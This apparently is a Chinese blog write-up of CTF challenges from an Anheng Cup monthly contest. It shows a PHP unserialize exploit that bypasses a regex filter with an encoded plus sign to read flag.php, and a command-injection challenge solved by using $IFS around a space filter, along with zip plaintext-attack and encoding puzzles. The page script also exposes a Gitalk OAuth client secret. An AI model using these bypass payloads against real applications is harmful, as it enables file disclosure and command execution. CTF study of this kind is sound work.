<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->


	<!DOCTYPE html>
	<html>
		

<head><meta name="generator" content="Hexo 3.8.0">
	<title>安恒杯十二月月赛</title>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="apple-mobile-web-app-title" content="Amaze UI">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <meta name="author" content="miraitowa">
    <meta name="keywords" content="">
    <meta name="description" content="">
   	<!-- css -->
	<link rel="stylesheet" href="/css/style.css">

	<!-- favicon -->
	<link href="/img/favicon.ico" rel="Shortcut Icon" type="image/ico">
	
	<!-- font-awesome -->
	<link href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
</head>

	<body>	
		<!--Preloader-->
<div id="preloader">
	<div id="status">
		<img alt="PRELOADER" src="/img/logo.png">
	</div>
</div>
<!--Preloader end-->

<!-- header -->

	<header id="header-bg-2">

	
		<div id="cd-logo"><a href="/"><img src="/img/logo.png" alt="Logo"></a></div>
	
	
	<!-- motto or description -->
		
 		<p class="motto"></p>
	
	
	<!-- current page name or title -->
	
		
		
			
			<p class="page-name">当前文章&nbsp;:&nbsp;《安恒杯十二月月赛》</p>
			
		
	
	
	<!-- others: such as change-bg, time... -->
	<p class="page-name-other">
		4/10/2019 
		<style type="text/css">
	header:after {
		content: '';
		position: relative;
		top: 0;
		left: 0;
		height: 100%;
		width: 100%;
		background: #222222;
		opacity: .5;
		z-index: -1;
	}
	
	.change-header-bg{
		font-style: normal;
	}
	.change-header-bg i{
		text-align: center;
		cursor: pointer;
		pointer-events: bounding-box;
	}
	@media(max-width:512px) {
		.change-header-bg {
			display: none;
			visibility: hidden;
		}
	}
	
</style>

<script type="text/javascript">
	function changeHeaderBg(){
		var random_bg = Math.floor(Math.random() * 109 + 1);
		var bg = 'url(https://miraitowa.github.io/Random-img/' + random_bg + '.jpg)';
		$("#header-bg-2").css("background-image", bg);
	}
</script>

<span class="change-header-bg">
	——&nbsp;<i class="fa fa-camera-retro" onclick="changeHeaderBg()"></i>	
</span>
	</p>		
</header>

<!-- nav -->
<div id="cd-nav">
	<a href="#0" title="menu" class="cd-nav-trigger"><span></span></a>

	<nav id="cd-main-nav">
		<ul>
			
      		<li class="fa fa-/">
           		<a href="/" title="主页">主页</a>	
      		</li>
    		
      		<li class="fa fa-/archives">
           		<a href="/archives" title="归档">归档</a>	
      		</li>
    		
      		<li class="fa fa-/categories">
           		<a href="/categories" title="分类">分类</a>	
      		</li>
    		
      		<li class="fa fa-/gallery">
           		<a href="/gallery" title="相册">相册</a>	
      		</li>
    		
      		<li class="fa fa-/about">
           		<a href="/about" title="关于">关于</a>	
      		</li>
    		
      		<li class="fa fa-/tags">
           		<a href="/tags" title="友链">友链</a>	
      		</li>
    		
    		
        	
		</ul>
	</nav>
</div>

		<!--main-->
		<main> 
		<div class="page-container">
		<!-- content srart -->
<div class="am-g am-g-fixed blog-fixed blog-content">
	<div class="am-u-md-8 am-u-sm-12">

		<article class="am-article blog-article-p">

			<div class="am-article-hd">
				


				<h1 class="am-article-title blog-text-center">
					
					
	
		<a href="/2019/03/21/安恒杯十二月月赛/" itemprop="url">		
			安恒杯十二月月赛		
		</a>
	

				</h1>

				<p class="am-article-meta blog-text-center">
					<span>
						<i class="fa fa-clock-o"></i> 
						<a href="/2019/03/21/安恒杯十二月月赛/" itemprop="url">
	<time datetime="2019-03-21T02:26:04.615Z" itemprop="datePublished">
  		2019-03-21
  </time>
</a>    
&nbsp;
					</span>
					
					<span>						
						
					</span>
				</p>
			</div>

			<div class="am-article-bd">
				<div class="content" id="post-content">
					
						<h3 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h3><h4 id="easy"><a href="#easy" class="headerlink" title="easy"></a>easy</h4><p>访问题目链接，给出了源码</p>
<pre><code>&lt;?php  
@error_reporting(1); 
include &#39;flag.php&#39;;
class baby 
{   
public $file;
function __toString()  
{  
if(isset($this-&gt;file)) 
{
$filename = &quot;./{$this-&gt;file}&quot;;
if (file_get_contents($filename)) 
{  
return file_get_contents($filename); 
} 
} 
}  
}  
if (isset($_GET[&#39;data&#39;]))  
{ 
$data = $_GET[&#39;data&#39;];
preg_match(&#39;/[oc]:\d+:/i&#39;,$data,$matches);
if(count($matches))
{
die(&#39;Hacker!&#39;);
}
else
{
$good = unserialize($data);
echo $good;
} 
} 
else 
{ 
highlight_file(&quot;./index.php&quot;); 
} 
?&gt;
</code></pre><p>很明显的是一道反序列化漏洞的题目，不太明白的读者可以查看一下：<a href="https://xz.aliyun.com/t/3674" target="_blank" rel="noopener">PHP反序列化由浅入深</a></p>
<p>在这道题目中自带一个<code>baby</code>类，里面<code>__toString()</code> 中可以用<code>file_get_contents</code>读文件内容：</p>
<p>可以自己本地来测试一下，获取序列化的对象。</p>
<pre><code>&lt;?php  

include &#39;flag.php&#39;;

class baby

{   

    public $file;

    function __toString()      

    {          

        if(isset($this-&gt;file))

        {

            $filename = &quot;./{$this-&gt;file}&quot;;        

            if (file_get_contents($filename))         

            {              

                return file_get_contents($filename);

            }

        }     

    }  

}  



$a = new baby();

$a -&gt; file = &quot;flag.php&quot;;

//echo $a-&gt;__toString(); 

echo serialize($a); 
?&gt;
</code></pre><p>得到：</p>
<pre><code>O:4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}
</code></pre><p>因为存在过滤出语句</p>
<pre><code>preg_match(&#39;/[oc]:\d+:/i&#39;,$data,$matches);
</code></pre><p>所以需要绕过,用加号进行绕过:</p>
<pre><code>O:+4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}
</code></pre><p>但如果直接传值的话会，服务器接收到会把加号认为空格，所以要对加号url编码：</p>
<pre><code>O:%2b4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}
</code></pre><p>然后直接访问：<br>    <a href="http://101.71.29.5:10007/index.php?data=O:%2b4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}" target="_blank" rel="noopener">http://101.71.29.5:10007/index.php?data=O:%2b4:&quot;baby&quot;:1:{s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;}</a></p>
<p>访问后查看源代码得到：</p>
<pre><code>$flag = &#39;flag{ad2328a2c3f0933c053fd3c6f28f6143}&#39;;
</code></pre><h4 id="ezweb2"><a href="#ezweb2" class="headerlink" title="ezweb2"></a>ezweb2</h4><p>请求包中发现一个<code>user=base64</code>字符串</p>
<p><img src="https://i.imgur.com/WBw0HNU.png" alt=""></p>
<p>base64解码之后得到</p>
<p><img src="https://i.imgur.com/fzuT0wq.png" alt=""></p>
<p>改成<code>admin</code>再<code>base64</code>一下，发现跳转到后台<code>admin.php</code></p>
<p><img src="https://i.imgur.com/6jutKbQ.png" alt=""></p>
<p>开始以为是ssrf，简单的试了个<code>http://www.baidu.com</code>提示error，然后又试了一个ls发现有回显。</p>
<p><img src="https://i.imgur.com/h87m1aH.png" alt=""></p>
<p>试了个<code>ls /</code>又提示<code>error</code>，经过测试发现过滤了空格，可以用<code>$IFS</code>绕过。</p>
<p><img src="https://i.imgur.com/85cNcid.png" alt=""></p>
<p>读取一下就会得到flag</p>
<p><img src="https://i.imgur.com/wHtv0NQ.png" alt=""></p>
<h3 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a>MISC</h3><h4 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h4><p>在公众号中回复一下就可以了</p>
<p><img src="https://i.imgur.com/xE3XMwg.png" alt=""></p>
<p><img src="https://i.imgur.com/KED00D3.png" alt=""></p>
<h4 id="JUJU"><a href="#JUJU" class="headerlink" title="JUJU"></a>JUJU</h4><p><strong>提示女朋友问我这11只JUJU哪只好看？答案提交flag{}括号内的值(flag中的字符串md5后提交)。</strong></p>
<p>这一题有点像前几天SWPUCTF2018中的签到题，由于提示中给出的是11只，更改一下高度就可以了</p>
<p><img src="https://i.imgur.com/9cD48LI.png" alt=""></p>
<p><img src="https://i.imgur.com/lKs3fAs.png" alt=""></p>
<p>把给出的字符进行base32解码就可以了，当时我想到的使用base64进行解码，发现是乱码，看了一下题目提示有MD5我使用md5加解密之后还是</p>
<p>不正确，问了一下客服(qaq),<strong>提示：你再看看题目</strong></p>
<p>后来想到使用BASE32，进行解码(QAQ)</p>
<p><img src="https://i.imgur.com/upNccHV.png" alt=""></p>
<h4 id="学习资料"><a href="#学习资料" class="headerlink" title="学习资料"></a>学习资料</h4><p>zip加密，一般zip加密只有那几种，并且打开zip文件里面还有一个已经给出的txt文件，还有一个经过加密的zip文件，很明显是明文攻击就可以了</p>
<p><img src="https://i.imgur.com/Z0Hz5di.png" alt=""></p>
<p>拿到密码，打开doc文件。。。。。。</p>
<p><img src="https://i.imgur.com/TQypGoz.png" alt=""></p>
<p>flag在图片的后面，移动图片就可以拿到flag：<code>Flag{edaa144c91a4e5b817e4a18cbdb78879}</code></p>
<p><strong>总结：</strong>推荐一个学习CTF的平台：<a href="https://ctf-wiki.github.io/ctf-wiki/" target="_blank" rel="noopener">https://ctf-wiki.github.io/ctf-wiki/</a></p>

					
				</div>
			</div>
		</article>

		<ul class="am-pagination">
    
    	<li class="am-pagination-prev">
   		<a class="pull-left" href="/2019/03/21/安恒杯十一月份月赛writeup/" title="安恒杯十一月份月赛writeup">
      		&laquo; 上一篇
		</a>
		</li>
	
	
		<li class="am-pagination-next">
		<a class="pull-right" href="/2019/03/21/WPScan使用完整教程之记一次对WordPress的渗透过程/" title="WPScan使用完整教程之记一次对WordPress的渗透过程">
			下一篇 &raquo;
		</a>
		</li>
	 
 </ul>
        

		<div class="theme-annie-comment-button-container">
	<button id="annie-comment-button" class="theme-annie-comment-button" onclick="Annie_Comment()">
		加载评论
		<!--加载评论-->
	</button>
</div>

<div id="annie-comment-container" class="theme-annie-comment-main-container">

	
		
			<!-- comment gitalk -->
			<!-- show gitalk comment -->

  <div id="gitalk-container"></div>


<!-- gitalk`s css & js -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<link rel="stylesheet" href="/css/comment.css">
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

<script type="text/javascript">
	//thanks O-R
	//https://github.com/gitalk/gitalk/issues/102#issuecomment-382970552
	//去除尾部匹配正则数组的字符串  
	//remove redundant characters
	String.prototype.trimEnd = function(regStr) {
		var result = this;
		if(regStr == undefined || regStr == null || regStr == "") {
			return result;
		}
		var array = regStr.split(',');

		if(array.length > 0) {

			var c = array.shift();
			var str = this;
			var i = str.length;
			var rg = new RegExp(c);
			var matchArr = str.match(rg);

			if(matchArr != undefined && matchArr != null && matchArr.length > 0) {
				var matchStr = matchArr[0].replace(/\\/g, "\\\\").replace(/\*/g, "\\*")
					.replace(/\+/g, "\\+").replace(/\|/g, "\\|")
					.replace(/\{/g, "\\{").replace(/\}/g, "\\}")
					.replace(/\(/g, "\\(").replace(/\)/g, "\\)")
					.replace(/\^/g, "\\^").replace(/\$/g, "\\$")
					.replace(/\[/g, "\\[").replace(/\]/g, "\\]")
					.replace(/\?/g, "\\?").replace(/\,/g, "\\,")
					.replace(/\./g, "\\.").replace(/\&/g, "\\&");
				matchStr = matchStr + '$';
				result = str.replace(new RegExp(matchStr), "");
			}

			if(array.length > 0) {
				return result.trimEnd(array.join())
			} else {
				return result;
			}
		}
	};

	//create gitalk
	var gitalk = new Gitalk({
		clientID: '74a83cc9b15a1cf53e10',
		clientSecret: 'b62af8b132c33178adcb0098e2315806e2e57cae',
		//id: window.location.pathname,
		// id: (window.location.pathname).split("/").pop().substring(0, 49),
		id: md5(location.href.trimEnd('#.*$,\\?.*$,index.html$')),
		repo: 'Annie-Gitalk',
		owner: 'miraitowa',
		admin: 'miraitowa',
		distractionFreeMode: 'true',
	})
	gitalk.render('gitalk-container');
</script>
		
	

</div>

<script type="text/javascript">
	/* Show Comment */
	var Annie_Comment = function() {
		function Show_Hidden(obj) {
			obj.style.display = 'block';
		}
		
		//var obutton = $('#annie-comment-button');
		//var obutton = $('#annie-comment-container');
		var obutton = document.getElementById("annie-comment-button" || "0");
		var odiv = document.getElementById("annie-comment-container");
		if( 'obutton' ) {
			obutton.onclick = function() {
				Show_Hidden(odiv);
				$("#annie-comment-button").css("display", 'none');
				return false;
			}
		}
	};

	(function Annie_Init() {
		Annie_Comment();
	})();
</script>
		
		<!--
	时间：2018-09-24
	描述：The TOC module refers to 'https://github.com/codefine/hexo-theme-mellow', include toc.ejs、toc.js、toc.css. All rights reserved by codefine. 
-->

	
		<aside class="post-widget">
			<nav class="post-toc-wrap" id="post-toc">
				
					<strong>文章目录</strong>
				
				
				<!--toc(post.content)-->
				<ol class="post-toc"><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#WEB"><span class="post-toc-text">WEB</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#easy"><span class="post-toc-text">easy</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#ezweb2"><span class="post-toc-text">ezweb2</span></a></li></ol></li><li class="post-toc-item post-toc-level-3"><a class="post-toc-link" href="#MISC"><span class="post-toc-text">MISC</span></a><ol class="post-toc-child"><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#签到题"><span class="post-toc-text">签到题</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#JUJU"><span class="post-toc-text">JUJU</span></a></li><li class="post-toc-item post-toc-level-4"><a class="post-toc-link" href="#学习资料"><span class="post-toc-text">学习资料</span></a></li></ol></li></ol>
			</nav>
			<div class="post-toc-bar"><div>
		</div></div></aside>
	

	</div>
</div>
		</div>
		</main>
		
		<!--footer-->
		<footer>
	<div class="blog-text-center">
		<div class="theme-annie-social">
				
				
					<a href="https://github.com/miraitowa" title="Github" target="_blank"><i class="fa fa-github"></i>&nbsp;</a>
					
				
				
					<a href="https://miraitowa.github.io/about/" title="Email" target="_blank"><i class="fa fa-envelope-o"></i>&nbsp;</a>
					
					
						
				
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			
				&copy; 2018 11 11 - 2019, content by miraitowa. All Rights Reserved.			       	
			
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.		
		</div>
	</div>
</footer>
		<!-- <script src="http://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript"></script> -->

<script>
	window.jQuery || document.write('<script src="/js/jquery-2.1.1.min.js"><\/script>')
</script>

<style>
	.motto {
		color: #000000;
		font-size: 20px;
		margin: 100px 25% 0;
		width: 50%;
		line-height: 1.4;
		font-family:"KaiTi", "STXingkai", "Source Sans Pro", "Segoe UI", "Lucida Grande", Helvetica, Arial, "Microsoft YaHei", FreeSans, Arimo, "Droid Sans", "wenquanyi micro hei", "Hiragino Sans GB", "Hiragino Sans GB W3", FontAwesome, sans-serif;
		text-align: center;
	}
	@media(max-width: 890px) {
		.motto {	
			margin: 100px 10% 0;
			width: 80%;
		}
	}
	@media(max-width: 890px) {
		.motto {
			margin: 100px 5% 0;
			width: 90%;
		}
	}
</style>


	<script src="/js/motto.js"></script>
	<script type="text/javascript">
		$(".motto").html(getMingYanContent());
	</script>	







	<script type="text/javascript" src="/js/toc.js"></script>


<script type="text/javascript" src="/js/main.js"></script>

<script type="text/javascript">
	//generate a random img that pre_name 'from 0 to 110'
	var random_bg = Math.floor(Math.random() * 109 + 1);

	//var bg = 'url(/img/random/' + random_bg + '.jpg)';		
	var bg = 'url(https://miraitowa.github.io/Random-img/' + random_bg + '.jpg)';

	$("#header-bg-2").css("background-image", bg);
</script>
		
		<!--back to top-->
        <style type="text/css">
	#totop {
		background: white;
		border-radius: 50%;
		position: fixed;
		right: 5.4%;
		bottom: 80px;
		cursor: pointer;
	}
	
	#totop a {
		color: #474747;
		background-color: transparent;
		padding: 10px;
		text-decoration: none;
	}
	
	@media(max-width:512px) {
		#totop {
			display: none;
			visibility: hidden;
		}
	}
</style>


	<div id="totop">
  		<a href="javascript:;" class="fa fa-arrow-up"></a>
	</div>

	</body>
	</html>

